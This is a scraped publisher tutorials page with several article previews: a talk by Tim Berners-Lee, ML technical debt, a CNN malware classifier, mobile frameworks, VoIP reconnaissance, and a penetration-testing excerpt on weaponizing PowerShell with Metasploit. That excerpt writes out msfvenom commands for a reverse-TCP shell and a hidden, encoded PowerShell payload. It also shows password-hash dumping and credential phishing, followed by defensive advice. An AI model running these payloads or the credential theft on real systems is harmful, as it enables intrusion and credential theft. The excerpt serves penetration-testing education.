Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

6719 Articles
article-image-tim-berners-lee-is-on-a-mission-to-save-the-web-he-invented
Bhagyashree R
07 Nov 2018
4 min read
Save for later

Tim Berners-Lee is on a mission to save the web he invented

Bhagyashree R
07 Nov 2018
4 min read
On Monday, at Web Summit 2018 in Lisbon, Tim Berners-Lee outlined his plan to ‘save’ the web he invented. His idea is simple: he wants to create a ‘contract’ for the web. The intervention comes at an important time, in a year of ‘techlash’ and increasing scepticism in the belief in technology’s and the web’s ability to deliver progress for everyone. Tim Berners-Lee on Contract for the Web In his talk, Berners-Lee pointed out that one of the properties the web should preserve is universality. He also argued that The web should be independent, with no restrictions on what it can be used for. It should be available in any region, culture, and religion. He sees these values as things that are currently under attack: “Those of us who are online are seeing our rights and freedoms threatened.” He also listed other challenges that have failed to be addressed, including fake news and privacy. His solution to these huge challenges is something called ‘Contract for the Web,’ which will, he claims, outline “clear and tough responsibilities for those who have the power to make it better.” Although Berners-Lee was relatively light on detail, the full contract is due to be published in May 2019. In theory, it should define people’s online rights and lists the key principles and duties government, companies, and citizens should follow. In Berners-Lee’s mind, it will restore some degree of equilibrium and transparency to the digital realm. The core principles of Contract for the Web Tim Berners-Lee did offer some information on what the Contract for the Web will include. Below are some of the key principles for the key stakeholders in the running of the web - government, businesses, and citizens - people like you. Government Anyone should be able to connect to the web irrespective of who they are and where they live and they should be allowed to actively participate online. Internet should be available all the time so that nobody is denied to the right of full internet access. Privacy, people's fundamental right, should be respected so that they can use the internet freely, safely, and without fear. Companies They should present the user an affordable and accessible internet. Consumers’ privacy and personal data should be respected. Make technologies that support the best in humanity and challenge the worst. Citizens Citizens should involve themselves in creating and collaborating to provide rich and relevant content for everyone. They should build strong communities that respect civil discourse and human dignity. To ensure that the open web remains open, they should come together and fight for it. This contract is already seeing a great support with more than 50 organisations signing the contract including some of big shots like Facebook and Google. This contract is being promoted by the campaign, #ForTheWeb. The contract is part of a broader project that Berners-Lee believes is essential if we are to ‘save’ the web from its current problems First, we need to create an open web for the users who are already connected to the web and give them the power of fixing issues that we have with the existing web. Secondly, we need to bring the other half of the world, which is not yet connected to the web. Tim Berners Lee speaks to CNN about Contract for the Web After his talk, Tim Berners-Lee was interviewed by Laurie Segall from CNN. Here are some highlights from the interview: Internally, companies should have the motto of doing the right thing. To make sure the principles are upheld, some measures will be introduced. But also, this contract is not just about creating a set of rules and enforcing them, rather it is about changing the attitude. Privacy is our fundamental right and we should always fight for it. Fighting for privacy is important, not just because of the data breaches we are seeing but to empower individuals to be able to share anything they want without any fear. As a tech company we should realize the implication of each line of code we write and think how it will affect people's lives. To sum it all up Tim Berners-Lee said: We all are going to step back and put aside all the myths we are currently taking as physics of the way things work. People do not have to motivated only by ad-based fund model or by click bates. Contract for the Web is about going back to the values. It is about people coming together to build the web and taking things in their own hand. You can watch the full Tim Berners-Lee's talk and the interview on YouTube. Web Summit 2018: day 2 highlights Tim Berners-Lee’s Solid – Trick or Treat? Sir Tim Berners-Lee on digital ethics and socio-technical systems at ICDPPC 2018
Read more
  • 0
  • 0
  • 2975

article-image-technical-and-hidden-debts-in-machine-learning-google-engineers-give-their-perspective
Prasad Ramesh
06 Nov 2018
6 min read
Save for later

Technical and hidden debts in machine learning - Google engineers’ give their perspective

Prasad Ramesh
06 Nov 2018
6 min read
In a paper, Google engineers have pointed out the various costs of maintaining a machine learning system. The paper, Hidden Technical Debt in Machine Learning Systems, talks about technical debt and other ML specific debts that are hard to detect or hidden. They found that is common to incur massive maintenance costs in real-world machine learning systems. They looked at several ML-specific risk factors to account for in system design. These factors include boundary erosion, entanglement, hidden feedback loops, undeclared consumers, data dependencies, configuration issues, changes in the external world, and a number of system-level anti-patterns. Boundary erosion in complex models In traditional software engineering, setting strict abstractions boundaries helps in logical consistency among the inputs and outputs of a given component. It is difficult to set these boundaries in machine learning systems. Yet, machine learning is needed in areas where the desired behavior cannot be effectively expressed with traditional software logic without depending on data. This results in a boundary erosion in a couple of areas. Entanglement Machine learning systems mix signals together, entangle them and make isolated improvements impossible. Change to one input may change all the other inputs and an isolated improvement cannot be done. It is referred to as the CACE principle: Change Anything Changes Everything. There are two possible ways to avoid this: Isolate models and serve ensembles. Useful in situations where the sub-problems decompose naturally. In many cases, ensembles work well as the errors in the component models are not correlated. Relying on this combination creates a strong entanglement and improving an individual model may make the system less accurate. Another strategy is to focus on detecting changes in the prediction behaviors as they occur. Correction cascades There are cases where a problem is only slightly different than another which already has a solution. It can be tempting to use the same model for the slightly different problem. A small correction is learned as a fast way to solve the newer problem. This correction model has created a new system dependency on the original model. This makes it significantly more expensive to analyze improvements to the models in the future. The cost increases when correction models are cascaded. A correction cascade can create an improvement deadlock. Visibility debt caused by undeclared consumers Many times a model is made widely accessible that may later be consumed by other systems. Without access controls, these consumers may be undeclared, silently using the output of a given model as an input to another system. These issues are referred to as visibility debt. These undeclared consumers may also create hidden feedback loops. Data dependencies cost more than code dependencies Data dependencies can carry a similar capacity as dependency debt for building debt, only more difficult to detect. Without proper tooling to identify them, data dependencies can form large chains that are difficult to untangle. They are of two types. Unstable data dependencies For moving along the process quickly, it is often convenient to use signals from other systems as input to your own. But some input signals are unstable, they can qualitatively or quantitatively change behavior over time. This can happen as the other system updates over time or made explicitly. A mitigation strategy is to create versioned copies. Underutilized data dependencies Underutilized data dependencies are input signals that provide little incremental modeling benefit. These can make an ML system vulnerable to change where it is not necessary. Underutilized data dependencies can come into a model in several ways—via legacy, bundled, epsilon or correlated features. Feedback loops Live ML systems often end up influencing their own behavior on being updated over time. This leads to analysis debt. It is difficult to predict the behavior of a given model before it is released in such a case. These feedback loops are difficult to detect and address if they occur gradually over time. This may be the case if the model is not updated frequently. A direct feedback loop is one in which a model may directly influence the selection of its own data for future training. In a hidden feedback loop, two systems influence each other indirectly. Machine learning system anti-patterns It is common for systems that incorporate machine learning methods to end up with high-debt design patterns. Glue code: Using generic packages results in a glue code system design pattern. In that, a massive amount of supporting code is typed to get data into and out of general-purpose packages. Pipeline jungles: Pipeline jungles often appear in data preparation as a special case of glue code. This can evolve organically with new sources added. The result can become a jungle of scrapes, joins, and sampling steps. Dead experimental codepaths: Glue code commonly becomes increasingly attractive in the short term. None of the surrounding structures need to be reworked. Over time, these accumulated codepaths create a growing debt due to the increasing difficulties of maintaining backward compatibility. Abstraction debt: There is a lack of support for strong abstractions in ML systems. Common smells: A smell may indicate an underlying problem in a component system. These can be data smells, multiple-language smell, or prototype smells. Configuration debt Debt can also accumulate when configuring a machine learning system. A large system has a wide number of configurations with respect to features, data selection, verification methods and so on. It is common that configuration is treated an afterthought. In a mature system, config lines can be larger than the code lines themselves and each configuration line has potential for mistakes. Dealing with external world changes ML systems interact directly with the external world and the external world is rarely stable. Some measures that can be taken to deal with the instability are: Fixing thresholds in dynamic systems It is necessary to pick a decision threshold for a given model to perform some action. Either to predict true or false, to mark an email as spam or not spam, to show or not show a given advertisement. Monitoring and testing Unit testing and end-to-end testing cannot ensure complete proper functioning of an ML system.  For long-term system reliability, comprehensive live monitoring and automated response is critical. Now there is a question of what to monitor. The authors of the paper point out three areas as starting points—prediction bias, limits for actions, and upstream producers. Other related areas in ML debt In addition to the mentioned areas, an ML system may also face debts from other areas. These include data testing debt, reproducibility debt, process management debt, and cultural debt. Conclusion Moving quickly often introduces technical debt. The most important insight from this paper, according to the authors is that technical debt is an issue that both engineers and researchers need to be aware of. Paying machine learning related technical debt requires commitment, which can often only be achieved by a shift in team culture. Prioritizing and rewarding this effort which needs to be recognized is important for the long-term health of successful machine learning teams. For more details, you can read the paper at NIPS website. Uses of Machine Learning in Gaming Julia for machine learning. Will the new language pick up pace? Machine learning APIs for Google Cloud Platform
Read more
  • 0
  • 0
  • 6937

article-image-how-to-build-a-convolution-neural-network-based-malware-detector-using-malware-visualization-tutorial
Savia Lobo
05 Nov 2018
9 min read
Save for later

How to build a convolution neural network based malware detector using malware visualization [Tutorial]

Savia Lobo
05 Nov 2018
9 min read
Deep Learning (DL), a subfield of machine learning, arose to help build algorithms that work like the human mind and are inspired by its structure. Information security professionals are also intrigued by such techniques, as they have provided promising results in defending against major cyber threats and attacks. One of the best-suited candidates for the implementation of DL is malware analysis. This tutorial is an excerpt taken from the book, Mastering Machine Learning for Penetration Testing written by Chiheb Chebbi. In this book, you will learn to identify ambiguities, extensive techniques to breach an intelligent system, and much more. In this post, we are going to explore artificial network architectures and learn how to use one of them to help malware analysts and information security professionals to detect and classify malicious code. Before diving into the technical details and the steps for the practical implementation of the DL method, it is essential to learn and discover the other different architectures of artificial neural networks. Convolutional Neural Networks (CNNs) Convolutional Neural Networks (CNNs) are a deep learning approach to tackle the image classification problem, or what we call computer vision problems, because classic computer programs face many challenges and difficulties to identify objects for many reasons, including lighting, viewpoint, deformation, and segmentation. This technique is inspired by how the eye works, especially the visual cortex function algorithm in animals. In CNN are arranged in three-dimensional structures with width, height, and depth as characteristics. In the case of images, the height is the image height, the width is the image width, and the depth is RGB channels. To build a CNN, we need three main types of layer: Convolutional layer: A convolutional operation refers to extracting features from the input image and multiplying the values in the filter with the original pixel values Pooling layer: The pooling operation reduces the dimensionality of each feature map Fully-connected layer: The fully-connected layer is a classic multi-layer perceptrons with a softmax activation function in the output layer To implement a CNN with Python, you can use the following Python script: import numpy from keras.datasets import mnist from keras.models import Sequential from keras.layers import Dense from keras.layers import Dropout from keras.layers import Flatten from keras.layers.convolutional import Conv2D from keras.layers.convolutional import MaxPooling2D from keras.utils import np_utils from keras import backend backend.set_image_dim_ordering('th') model = Sequential() model.add(Conv2D(32, (5, 5), input_shape=(1, 28, 28), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.2)) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) Recurrent Neural Networks (RNNs) Recurrent Neural Networks (RNNs) are artificial neural networks where we can make use of sequential information, such as sentences. In other words, RNNs perform the same task for every element of a sequence, with the output depending on the previous computations. RNNs are widely used in language modeling and text generation (machine translation, speech recognition, and many other applications). RNNs do not remember things for a long time. Long Short Term Memory networks Long Short Term Memory (LSTM) solves the short memory issue in recurrent neural networks by building a memory block. This block sometimes is called a memory cell. Hopfield networks Hopfield networks were developed by John Hopfield in 1982. The main goal of Hopfield networks is auto-association and optimization. We have two categories of Hopfield network: discrete and continuous. Boltzmann machine networks Boltzmann machine networks use recurrent structures and they use only locally available information. They were developed by Geoffrey Hinton and Terry Sejnowski in 1985. Also, the goal of a Boltzmann machine is optimizing the solutions. Malware detection with CNNs For this new model, we are going to discover how to build a malware classifier with CNNs. But I bet you are wondering how we can do that while CNNs are taking images as inputs. The answer is really simple, the trick here is converting malware into an image. Is this possible? Yes, it is. Malware visualization is one of many research topics during the past few years. One of the proposed solutions has come from a research study called Malware Images: Visualization and Automatic Classification by Lakshmanan Nataraj from the Vision Research Lab, University of California, Santa Barbara. The following diagram details how to convert malware into an image: The following is an image of the Alueron.gen!J malware: This technique also gives us the ability to visualize malware sections in a detailed way: By solving the issue of how to feed malware machine learning classifiers that use CNNs by images, information security professionals can use the power of CNNs to train models. One of the malware datasets most often used to feed CNNs is the Malimg dataset. This malware dataset contains 9,339 malware samples from 25 different malware families. You can download it from Kaggle (a platform for predictive modeling and analytics competitions) by visiting this link: https://www.kaggle.com/afagarap/malimg-dataset/data. These are the malware families: Allaple.L Allaple.A Yuner.A Lolyda.AA 1 Lolyda.AA 2 Lolyda.AA 3 C2Lop.P C2Lop.gen!G Instant access Swizzor.gen!I Swizzor.gen!E VB.AT Fakerean Alueron.gen!J Malex.gen!J Lolyda.AT Adialer.C Wintrim.BX Dialplatform.B Dontovo.A Obfuscator.AD Agent.FYI Autorun.K Rbot!gen Skintrim.N After converting malware into grayscale images, you can get the following malware representation so you can use them later to feed the machine learning model: The conversion of each malware to a grayscale image can be done using the following Python script: import os import scipy import array filename = '<Malware_File_Name_Here>'; f = open(filename,'rb'); ln = os.path.getsize(filename); width = 256; rem = ln%width; a = array.array("B"); a.fromfile(f,ln-rem); f.close(); g = numpy.reshape(a,(len(a)/width,width)); g = numpy.uint8(g); scipy.misc.imsave('<Malware_File_Name_Here>.png',g); For feature selection, you can extract or use any image characteristics, such as the texture pattern, frequencies in image, intensity, or color features, using different techniques such as Euclidean distance, or mean and standard deviation, to generate later feature vectors. In our case, we can use algorithms such as a color layout descriptor, homogeneous texture descriptor, or global image descriptors (GIST). Let's suppose that we selected the GIST; pyleargist is a great Python library to compute it. To install it, use PIP as usual: # pip install pyleargist==1.0.1 As a use case, to compute a GIST, you can use the following Python script: import Image Import leargist image = Image.open('<Image_Name_Here>.png'); New_im = image.resize((64,64)); des = leargist.color_gist(New_im); Feature_Vector = des[0:320]; Here, 320 refers to the first 320 values while we are using grayscale images. Don't forget to save them as NumPy arrays to use them later to train the model. After getting the feature vectors, we can train many different models, including SVM, k-means, and artificial neural networks. One of the useful algorithms is that of the CNN. Once the feature selection and engineering is done, we can build a CNN. For our model, for example, we will build a convolutional network with two convolutional layers, with 32 * 32 inputs. To build the model using Python libraries, we can implement it with the previously installed TensorFlow and utils libraries. So the overall CNN architecture will be as in the following diagram: This CNN architecture is not the only proposal to build the model, but at the moment we are going to use it for the implementation. To build the model and CNN in general, I highly recommend Keras. The required imports are the following: import keras from keras.models import Sequential,Input,Model from keras.layers import Dense, Dropout, Flatten from keras.layers import Conv2D, MaxPooling2D from keras.layers.normalization import BatchNormalization from keras.layers.advanced_activations import LeakyReLU As we discussed before, the grayscale image has pixel values that range from 0 to 255, and we need to feed the net with 32 * 32 * 1 dimension images as a result: train_X = train_X.reshape(-1, 32,32, 1) test_X = test_X.reshape(-1, 32,32, 1) We will train our network with these parameters: batch_size = 64 epochs = 20 num_classes = 25 To build the architecture, with regards to its format, use the following: Malware_Model = Sequential() Malware_Model.add(Conv2D(32, kernel_size=(3,3),activation='linear',input_shape=(32,32,1),padding='same')) Malware_Model.add(LeakyReLU(alpha=0.1)) Malware_model.add(MaxPooling2D(pool_size=(2, 2),padding='same')) Malware_Model.add(Conv2D(64, (3, 3), activation='linear',padding='same')) Malware_Model.add(LeakyReLU(alpha=0.1)) Malware_Model.add(Dense(1024, activation='linear')) Malware_Model.add(LeakyReLU(alpha=0.1)) Malware_Model.add(Dropout(0.4)) Malware_Model.add(Dense(num_classes, activation='softmax')) To compile the model, use the following: Malware_Model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(),metrics=['accuracy']) Fit and train the model: Malware_Model.fit(train_X, train_label, batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(valid_X, valid_label)) As you noticed, we are respecting the flow of training a neural network that was discussed in previous chapters. To evaluate the model, use the following code: Malware_Model.evaluate(test_X, test_Y_one_hot, verbose=0) print('The accuracy of the Test is:', test_eval[1]) Thus, in this post, we discovered how to build malware detectors using different machine learning algorithms, especially using the power of deep learning techniques.  If you've enjoyed reading this post, do check out  Mastering Machine Learning for Penetration Testing to find loopholes and surpass a self-learning security system This AI generated animation can dress like humans using deep reinforcement learning DeepCube: A new deep reinforcement learning approach solves the Rubik’s cube with no human help “Deep meta reinforcement learning will be the future of AI where we will be so close to achieving artificial general intelligence (AGI)”, Sudharsan Ravichandiran
Read more
  • 0
  • 0
  • 6170

article-image-weaponizing-powershell-with-metasploit-and-how-to-defend-against-powershell-attacks-tutorial
Savia Lobo
04 Nov 2018
4 min read
Save for later

Weaponizing PowerShell with Metasploit and how to defend against PowerShell attacks [Tutorial]

Savia Lobo
04 Nov 2018
4 min read
PowerShell is a perfect tool for performing sophisticated attacks, and also, can be used side-by-side with the Metasploit Framework. This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN. In today's post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests. Interactive PowerShell PowerShell attacks are already integrated into Metasploit. You can check by using the search command: msf> search powershell Now it is time to learn how to use Metasploit with PowerShell. For a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility: >msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe >msfvenom -p windows/exec CMD=“powershell -ep bypass -W Hidden -enc [Powershell script Here]” -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe PowerSploit PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, you need to grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit: # git clone https://github.com/PowerShellMafia/PowerSploit After cloning the project, use the ls command to list the files: From the following screenshot, you can note that PowerSploit contains a lot of amazing scripts for performing a number of tasks, such as: AntivirusBypass Exfiltration Persistence PowerSploit PowerUp PowerView Nishang – PowerShell for penetration testing Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang: # git clone https://github.com/samratashok/nishang As you can see from listing the downloaded project, Nishang is loaded with many various scripts and utilities for performing a lot of required tasks during penetration testing missions, such as: Privilege escalation Scanning Pivoting   You can explore all the available scripts by listing the content of Nishang project using the ls command: Let's explore some of Nishang's script power on a Windows machine: You can import all the modules using the Import-Module PowerShell cmdlet: Oops, something went wrong! Don't worry, in order to use the Import-Module, you need to open PowerShell as an administrator, and type  Set-ExecutionPolicy -ExecutionPolicy RemoteSigned: Then you can import the modules: Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information: If you want  to unveil WLAN keys, type Get-WLAN-Keys: You can go further and dump password hashes from a target machine in a post-exploitation mission. Thanks to the Get-PassHashes module, you are able to dump password hashes. This is the output of it from my local machine: However, if you want to pop the command after getting a shell, use: Powershell.exe –exec bypass –Command “& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1' , Get-PassHashes}” You can even perform a phishing attack using Invoke-CredentialPhish, like in the previous demonstration. You can run this attack on the victim's machine: Defending against PowerShell attacks In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to: Implement the latest PowerShell version (version 5, when this book was written). To check, type Get-Host: Monitor PowerShell logs. Ensure a least-privilege policy and group policies settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker: Use the Constrained Language mode: PS C:Windowssystem32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine') To check the Constrained Language mode, type: $ExecutionContext.SessionState.LanguageMode That way, malicious scripts won't work: Thus, in this article, we saw the combination of Metasploit and PowerShell to perform more customized attacks and security tests. If you've enjoyed reading this post, and want to learn how to exploit enterprise VLANS, and go from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing. Pentest tool in focus: Metasploit Approaching a Penetration Test Using Metasploit Getting Started with Metasploitable2 and Kali Linux
Read more
  • 0
  • 0
  • 14088

article-image-javascript-mobile-frameworks-comparison-react-native-vs-ionic-vs-nativescript
Bhagyashree R
03 Nov 2018
11 min read
Save for later

JavaScript mobile frameworks comparison: React Native vs Ionic vs NativeScript

Bhagyashree R
03 Nov 2018
11 min read
Previously, when you wanted to build for both web and mobile, you would have to invest in separate teams with separate development workflows. Isn't that annoying? JavaScript-driven frameworks have changed this equation. You can now build mobile apps without having to learn a completely new language such as Kotlin, Java, Objective C, and development approach and use your current skills of web development. One of the first technologies to do this was Cordova, which enabled web developers to package their web apps into a native binary, and to access device APIs through plugins. Since then, developers have created a variety of alternative approaches to using JavaScript to drive native iOS and Android applications. In this article we will talk about three of these frameworks: React Native, Ionic, and NativeScript. After introducing you to these frameworks, we will move on to their comparison and try to find which one of them is best on what scenarios. What exactly are native and hybrid applications? Before we start with the comparison, let’s answer this simple question as we are going to use these terms a lot in this article. What are native applications? Native applications are built for a particular platform and are written in a particular language. For example, Android apps are written in Java or Kotlin, and iOS apps are written in Objective C and Swift. The word “native” here refers to a platform such as Android, iOS, or Windows phone. Designed for a specific platform, these apps are considered to be more efficient in terms of performance, as well as being more reliable. The downside of native applications is that a separate version of the app must be developed for each platform. As it is written in a completely different programming language, you can’t reuse any piece of code from another platform version. That’s why native app development is considered to be more time consuming and expensive in comparison to hybrid applications, at least in theory. What are hybrid applications? Unlike native applications, hybrid applications are cross-platform. They are written in languages such as C# or JavaScript and compiled to be executed on each platform. For device specific interactions, hybrid applications utilize the support of plugins.Developing them is faster and simpler. Also, they are less expensive as you have to develop only one app instead of developing multiple native apps for different platforms. The major challenge with hybrid apps is that they run in WebView which means they depend on the native browser. Because of this, hybrid apps aren’t as fast as native apps. You can also face serious challenges if the app requires complex interaction with the device. After all, there’s a limit to what plugins can achieve on this front. As all the rendering is done using web tech, we can’t produce a truly native user experience. Let’s now move on to the overview of the three frameworks: What is React Native? Source: React Native The story of React Native started in the summer of 2013 as Facebook’s internal hackathon project and it was later open sourced in 2015. React Native is a JavaScript framework used to build native mobile applications. As you might have already guessed from its name, React Native is based on React, a JavaScript library for building user interfaces. The reason why it is called “native” is that the UI built with React Native consists of native UI widgets that look and feel consistent with the apps you built using native languages. How does React Native work? Under the hood, React Native translates your UI definition written in Javascript/JSX into a hierarchy of native views correct for the target platform. For example, if we are building an iOS app, it will translate the Text primitive to a native iOS UIView, and in Android, it will result with a native TextView. So, even though we are writing a JavaScript application, we do not get a web app embedded inside the shell of a mobile one. We are getting a “real native app”. But how does this “translation” takes place? React Native runs on JavaScriptCore, the JavaScript engine on iOS and Android, and then renders native components. React components return markup from their render function, which describes how they should look. With React for the Web, this translates directly to the browser’s DOM. For React Native, this markup is translated to suit the host platform, so a <View> might become an Android-specific TextView. Applications built with React Native All the recent features in the Facebook app such as Blood Donations, Crisis Response, Privacy Shortcuts, and Wellness Checks were built with React Native. Other companies or products that use this framework include Instagram, Bloomberg, Pinterest, Skype, Tesla, Uber, Walmart, Wix, Discord, Gyroscope, SoundCloud Pulse, Tencent QQ, Vogue, and many more. What is Ionic framework? Source: Ionic Framework The Ionic framework was created by Drifty Co. and was initially released in 2013. It is an open source, frontend SDK for developing hybrid mobile apps with familiar web technologies such as HTML5, CSS, and JavaScript. With Ionic, you will be able to build and deploy apps that work across multiple platforms, such as native iOS, Android, desktop, and the web as a Progressive Web App. How does Ionic framework work? Ionic is mainly focused on an application’s look and feel, or the UI interaction. This tells us that it’s not meant to replace Cordova or your favorite JavaScript framework. In fact, it still needs a native wrapper like Cordova to run your app as a mobile app. It uses these wrappers to gain access to host operating systems features such as Camera, GPS, Flashlight, etc. Ionic apps run in low-level browser shell like UIWebView in iOS or WebView in Android, which is wrapped by tools like Cordova/PhoneGap. Currently, Ionic Framework has official integration with Angular, and support for Vue and React are in development. They have recently released the Ionic 4 beta version, which comes with better support for Angular. This version supports the new Angular tooling and features, ensuring that Ionic apps follow Angular standards and conventions. Applications built with Ionic Some of the apps that use Ionic framework are MarketWatch, Pacifica, Sworkit, Vertfolio and many more. You can view the full list of applications built with Ionic framework on their website. What is NativeScript? Source: NativeScript NativeScript is developed by Telerik (a subsidiary of Progress) and was first released in 2014. It’s an open source framework that helps you build apps using JavaScript or any other language that transpiles to JavaScript, for example, TypeScript. It directly supports the Angular framework and supports the Vue framework via a community-developed plugin. Mobile applications built with NativeScript result in fully native apps, which use the same APIs as if they were developed in Xcode or Android Studio. Additionally, software developers can re-purpose third-party libraries from CocoaPods, Android Arsenal, Maven, and npm.js in their mobile applications without the need for wrappers. How does NativeScript work? Since the applications are built in JavaScript there is a need of some proxy mechanism to translate JavaScript code to the corresponding native APIs. This is done by the runtime parts of NativeScript, which act as a “bridge” between the JavaScript and the native world (Android and iOS). The runtimes facilitate calling APIs in the Android and iOS frameworks using JavaScript code. To do that JavaScript Virtual Machines are used - Google’s V8 for Android and WebKit’s JavaScriptCore implementation distributed with iOS 7.0+. Applications built with NativeScript Some of the applications built with NativeScript are Strudel, BitPoints Wallet, Regelneef, and Dwitch. React Native vs Ionic vs NativeScript Now that we’ve introduced all the three frameworks, let’s tackle the difficult question: which framework is better? #1 Learning curve The time for learning any technology will depend on the knowledge you already have. If you are a web developer familiar with HTML5, CSS, and Javascript, it will be fairly easy for you to get started with all the three frameworks. But if you are coming from a mobile development background, then the learning curve will be a bit steep for all the three. Among the three of them, the Ionic framework is easy to learn and implement and they also have great documentation. #2 Community support Going by the GitHub stats, React Native is way ahead the other two frameworks be it in terms of popularity of the repository or the number of contributors. This year's GitHub Octoverse report also highlighted that React Native is one of the most active open source project currently. The following table shows the stats at the time of writing: Framework Stars Forks Contributors React Native 70150 15712 1767 Ionic 35664 12205 272 NativeScript 15200 1129 119 Source: GitHub Comparing these three frameworks by the weekly package downloads from the npm website also indicate that React Native is the most popular framework among the three. The comparison is shown as follows: Source: npm trends #3 Performance Ionic apps, as mentioned earlier, are hybrid apps, which means they run on the WebView.  Hybrid applications, as mentioned in the beginning, are arguably slower as compared to the JavaScript-driven native applications, as their speed depends on the WebView. This also makes Ionic not so suitable for high performance or UI intensive apps such as for game development. React Native, in turn, provides faster application speed. Since, React works separately from the main UI thread, your application can maintain high performance without sacrificing capability. Additionally, the introduction of the React Fiber algorithm, which was implemented with the goal of visual rendering acceleration adds up to its better performance. In the case of NativeScript, rendering slows down a NativeScript application. Also, the applications built with NativeScript for the Android platform are larger in size. This large size of the application influences the performance in a negative way. #4 Marketplace The marketplace for Ionic is great. The tool lists many starter apps, themes, and plugins. Plugins range from a DatePicker to Google Maps. Similarly, NativeScript has its official marketplace listing 923 plugins in total. React Native, on the other hand, does not have a dedicated marketplace from Facebook. However, there are some companies that do provide React Native plugins and starter apps. #5 Reusability of the codebase Because Ionic is a framework for developing “wrapped applications", it wins the code reusability contest hands down. Essentially, the very concept of Ionic is “write once, run everywhere”. NativeScript isn’t far behind Ionic in terms of code reusability. In August this year, the Progress team announced that they are working on a Code-Sharing Project. To realize this code-sharing dream, together the Angular and NativeScript teams have created nativescript-schematics, a schematic that enables you to build both web and mobile apps from a single project. In the case of React Native, you will be able to reuse the logic and structure of the components, however, you would have to rewrite the UI used in them. React Native follows a different approach: “learn once, write everywhere”. This means that the same team of developers who built the iOS version will be able to understand enough to build the Android version, but they still need to have some knowledge of Android. With React Native you will end up having two separate projects. That’s fine because they are for two different platforms, but their internal structure will still be very similar. So, which JavaScript mobile framework is best? All three mobile frameworks come with their pros and cons. These frameworks are meant for the same objective but different project requirements. Choosing any one of them depends on your project, your user requirements, and the skills of your team. While Ionic comes with the benefit of a single codebase, it’s not suitable for graphics-intensive applications. React Native provides better performance than the other two, but adds the overhead of creating native shell for each platform. The best thing about NativeScript is that it supports Vue, which is one of fastest growing JavaScript frameworks. But its downside is that it makes the app size large. In the future we will see more such frameworks to help developers quickly prototype, develop, and ship cross-platform application. One of them is Flutter by Google which is already creating a wave. Nativescript 4.1 has been released React Native 0.57 released with major improvements in accessibility APIs, WKWebView-backed implementation, and more! Ionic framework announces Ionic 4 Beta
Read more
  • 0
  • 0
  • 11532

article-image-how-to-attack-an-infrastructure-using-voip-exploitation-tutorial
Savia Lobo
03 Nov 2018
9 min read
Save for later

How to attack an infrastructure using VoIP exploitation [Tutorial]

Savia Lobo
03 Nov 2018
9 min read
Voice over IP (VoIP) is pushing business communications to a new level of efficiency and productivity. VoIP-based systems are facing security risks on a daily basis. Although a lot of companies are focusing on the VoIP quality of service, they ignore the security aspects of the VoIP infrastructure, which makes them vulnerable to dangerous attacks. This tutorial is an extract taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will explore exploitation abilities such as offensive PowerShell tools and techniques, CI servers, database exploitation, Active Directory delegation, and much more. In today's post, you will learn how to penetrate the VoIP infrastructure. Like any other penetration testing, to exploit the VoIP infrastructure, we need to follow a strategic operation based on a number of steps. Before attacking any infrastructure, we've learned that we need to perform footprinting, scanning, and enumeration before exploiting it, and that is exactly what we are going to do with VoIP. To perform VoIP information gathering, we need to collect as much useful information as possible about the target. As a start, you can do a simple search online. For example, job announcements could be a valuable source of information. For example, the following job description gives the attacker an idea about the VoIP: Later, an attacker could search for vulnerabilities out there to try exploiting that particular system. Searching for phone numbers could also be a smart move, to have an idea of the target based on its voicemail, because each vendor has a default one. If the administrator has not changed it, listening to the voicemail can let you know about your target. If you want to have a look at some of the default voicemails, check http://www.hackingvoip.com/voicemail.html. It is a great resource for learning a great deal about hacking VoIP. Google hacking is an amazing technique for searching for information and online portals. We discussed Google hacking using Dorks. The following demonstration is the output of this Google Dork—in  URL: Network Configuration Cisco: You can find connected VoIP devices using the Shodan.io search engine: VoIP devices are generally connected to the internet. Thus, they can be reached by an outsider. They can be exposed via their web interfaces; that is why, sometimes leaving installation files exposed could be dangerous, because using a search engine can lead to indexing the portal. The following screenshot is taken from an online Asterisk management portal: And this screenshot is taken from a configuration page of an exposed website, using a simple search engine query: After collecting juicy information about the target, from an attacker perspective, we usually should perform scanning. Using scanning techniques is necessary during this phase. Carrying out Host Discovery and Nmap scanning is a good way of scanning the infrastructure to search for VoIP devices. Scanning can lead us to discover VoIP services. For example, we saw the -sV option in Nmap to check services. In VoIP, if port 2000 is open, it is a Cisco CallManager because the SCCP protocol uses that port as default, or if there is a UDP 5060 port, it is SIP. The -O Nmap option could be useful for identifying the running operating system, as there are a lot of VoIP devices that are running on a specific operating system, such as Cisco embedded. 